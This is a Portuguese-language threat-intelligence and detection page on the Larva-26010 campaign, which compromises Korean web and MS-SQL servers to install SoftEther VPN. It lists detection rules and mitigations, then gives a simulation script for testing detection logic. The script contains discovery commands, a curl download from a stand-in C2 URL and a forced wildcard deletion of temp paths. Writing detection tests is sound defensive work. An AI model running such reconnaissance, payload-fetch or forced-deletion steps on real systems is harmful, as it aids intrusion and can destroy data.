Campanha de Malware Alveja Servidores Web Coreanos que Usam SoftEther VPN
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O ator de ameaça Larva-26010 está direcionando servidores web e MS-SQL na Coreia do Sul para implantar SoftEther VPN. Sistemas comprometidos são reutilizados como servidores VPN, potencialmente usando conexões em cascata para ocultar a verdadeira infraestrutura de C&C dos atacantes. A intrusão geralmente começa com o comprometimento do servidor web, seguido pela implantação de web shells e SQLShells.
Investigação
O Centro de Inteligência de Segurança da AhnLab identificou atividade de ataque recente ocorrendo entre abril e agosto de 2026. A investigação revelou uma mudança na sequência de ataque, com servidores web sendo comprometidos primeiro, seguidos por comandos de descoberta, instalação do SoftEther VPN e ataques subsequentes contra servidores MS-SQL para implantar CLR SqlShell. Os atacantes também utilizaram ferramentas como PowerShell, bitsadmin, e certutil para entrega de payload.
Mitigação
Os administradores devem inspecionar servidores web quanto a vulnerabilidades exploráveis e validar todos os valores de entrada usados em consultas DBMS e solicitações de serviço web. Permissões de execução devem ser restritas em diretórios de upload, enquanto servidores web IIS e sistemas operacionais devem permanecer totalmente atualizados. Produtos de antivírus e segurança, como V3, também devem ser atualizados para a versão mais recente disponível.
Resposta
Se atividade maliciosa for detectada, servidores web e MS-SQL afetados devem ser isolados imediatamente para limitar o movimento lateral. Investigadores devem determinar a extensão do deployment de web shell e SqlShell e revisar contas de usuário recém-criadas para identificar contas de administrador não autorizadas. Configurações de registro, como UseLogonCredential também devem ser examinadas para modificações suspeitas.
Fluxo de Ataque
Detecções
Usando Certutil para Codificação de Dados e Operações de Certificados (via linha de comando)
Download ou Upload via Powershell (via linha de comando)
Possível Enumeração do Sistema (via linha de comando)
Possível Descoberta da Configuração da Rede do Sistema (via linha de comando)
Possível Execução por Uso de Nome Curto de Script (via linha de comando)
Uso Suspeito de CURL (via linha de comando)
Download de Arquivo Suspeito por IP Direto (via proxy)
IOCs (HashMd5) para detectar: Casos de Ataque de Malware para Servidores Web Domésticos Rodando SoftEther VPN na Coreia
IOCs (SourceIP) para detectar: Casos de Ataque de Malware para Servidores Web Domésticos Rodando SoftEther VPN na Coreia
IOCs (DestinationIP) para detectar: Casos de Ataque de Malware para Servidores Web Domésticos Rodando SoftEther VPN na Coreia
Ataque Potencial de DoS Detectado AWS CloudFront [AWS Cloudtrail]
Downloader de PowerShell e Escalada de Privilégio via Criação de Conta de Usuário [Windows Powershell]
Descoberta do Microsoft Windows e Instalação do SoftEther VPN [Servidor Web]
## Execução da Simulação
Pré-requisito: O Check de Telemetria & Baseline Pré-voo deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a erros de diagnóstico.
-
Narrativa de Ataque & Comandos: O adversário obteve acesso inicial através de uma vulnerabilidade na web. Para facilitar o movimento lateral e estabelecer uma backdoor persistente, eles precisam mapear a rede local e baixar o instalador do SoftEther VPN. O atacante executa
ipconfig /allpara mapear a interface,whoamipara confirmar privilégios, e usacurlpara buscar o instalador de um servidor de comando e controle remoto (C2). Esta sequência específica é projetada para acionar a lógica de detecção “Instalação do SoftEther VPN” ao corresponder as strings de linha de comando exatas definidas na regra Sigma. -
Script de Teste de Regressão:
# Script de Simulação: Descoberta SoftEther e Download de Payload # Este script executa os comandos exatos que a regra procura. Write-Host "[+] Iniciando Fase de Descoberta..." -ForegroundColor Cyan # Comando de seleção ativado: 'whoami' whoami # Comando de seleção ativado: 'ipconfig /all' ipconfig /all # Comando de seleção ativado: 'netstat -ano -p tcp' netstat -ano -p tcp # Comando de seleção ativado: 'systeminfo' systeminfo Write-Host "[+] Iniciando Fase de Download de Payload..." -ForegroundColor Cyan # Imagens de seleção ativadas: 'curl.exe' E comando de seleção ativado: 'curl -h' # Nota: Usamos -h para permanecer dentro da lógica da regra ao simular uma intenção de download curl -h https://example.com/softether_installer.exe Write-Host "[+] Simulação Completa." -ForegroundColor Green -
Comandos de Limpeza:
# Nenhum arquivo foi realmente baixado nesta simulação, # mas garantimos que nenhum artefato permaneça. Remove-Item -Path "$env:TEMP*" -Force -ErrorAction SilentlyContinue